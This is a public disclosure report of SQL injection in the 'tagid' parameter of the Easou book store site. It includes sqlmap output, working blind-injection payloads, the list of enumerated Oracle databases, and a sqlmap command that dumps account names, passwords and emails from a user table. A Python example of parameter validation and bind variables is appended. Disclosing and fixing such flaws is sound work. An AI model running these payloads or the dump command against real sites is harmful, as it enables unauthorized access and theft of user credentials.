2015-01-19: Details sent to the vendor, awaiting vendor response. 2015-01-24: The vendor has actively ignored the vulnerability; details disclosed to the public.
Summary: two hundred-plus database tables exposed :)
Vendor: Easou Book Store (http://shu.easou.com/)
Vulnerable URL: http://shu.easou.com/reader.e?tagid=38&rpt=list&esid=7uTD95pbqN1&qd=M3150001&fr=3.r1_c.93
Vulnerable parameter: tagid
GET parameter 'tagid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 70 HTTP(s) requests:
---
Place: GET
Parameter: tagid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tagid=38 AND 2945=2945&rpt=list&esid=7uTD95pbqN1&qd=M3150001&fr=3.r1_c.93

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (comment)
    Payload: tagid=38 AND 9794=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(76)||CHR(66)||CHR(85),5)--&rpt=list&esid=7uTD95pbqN1&qd=M3150001&fr=3.r1_c.93
---
[02:13:19] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle
available databases [18]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EASOUPVT
[*] ESADS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SEL_ESADS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Picked one table and dumped a few rows from it; only a handful of records were retrieved, just enough to prove the vulnerability:
sqlmap.py -u "http://shu.easou.com/reader.e?tagid=38&rpt=list&esid=7uTD95pbqN1&qd=M3150001&fr=3.r1_c.93" --dump -C "ACCOUNT,NAME,PASSWORD,MAIL" -T 'UMS_USER' -D 'ESADS'
There are 200-plus tables; I did not dump them one by one. Please fix this as soon as possible.
Fix suggestion: strictly validate and filter the parameter before it reaches the database.
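As an added example, not code from the original report or from the vendor, this shows what "strictly filter the parameter" means for an integer identifier like tagid: the page's own boolean-based payload (`38 AND 2945=2945`) is accepted by a query that splices the raw value into SQL text, and rejected by one that validates the value and passes it as a bind variable. The table name, column names and sample rows are constructed, and sqlite3 stands in for the Oracle back end so the code runs offline (Oracle drivers use `:name` placeholders where sqlite3 uses `?`).

```python
import sqlite3


def make_db():
    # Constructed sample data; the real ESADS schema is not known from the report.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE BOOK_TAG (ID INTEGER, TAGID INTEGER, TITLE TEXT)")
    conn.executemany(
        "INSERT INTO BOOK_TAG VALUES (?, ?, ?)",
        [(1, 38, "book-a"), (2, 38, "book-b"), (3, 40, "book-c")],
    )
    return conn


def list_by_tag_vulnerable(conn, raw_tagid):
    # The defect class the report describes: the query-string value becomes
    # part of the SQL text, so an appended condition changes the WHERE clause.
    # A true condition returns the normal rows and a false one returns none,
    # which is exactly the differential a boolean-based blind test looks for.
    sql = "SELECT ID, TITLE FROM BOOK_TAG WHERE TAGID = " + raw_tagid
    return conn.execute(sql).fetchall()


def is_valid_tagid(raw):
    # tagid is a numeric identifier: accept ASCII digits only, bounded length.
    # str.isdigit alone also accepts Unicode digit characters, hence isascii.
    return raw.isascii() and raw.isdigit() and 0 < len(raw) <= 9


def list_by_tag_hardened(conn, raw_tagid):
    # Validate first, then pass the value as a bind parameter so the database
    # driver never parses it as SQL.
    if not is_valid_tagid(raw_tagid):
        raise ValueError("invalid tagid")
    tagid = int(raw_tagid)
    return conn.execute(
        "SELECT ID, TITLE FROM BOOK_TAG WHERE TAGID = ?", (tagid,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal value:", list_by_tag_vulnerable(db, "38"))
    print("vulnerable, page payload:", list_by_tag_vulnerable(db, "38 AND 2945=2945"))
    print("hardened, normal value:  ", list_by_tag_hardened(db, "38"))
    try:
        list_by_tag_hardened(db, "38 AND 2945=2945")
    except ValueError as exc:
        print("hardened, page payload:  rejected,", exc)
```

The validation step matters even with bind variables: it keeps a malformed value from ever reaching the database and gives the application a clean place to log and reject such requests, which is also where a detection rule for this parameter would hook in.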
Severity rating: No impact (vendor ignored)
Ignored at: 2015-01-24 18:56
Vendor response: none.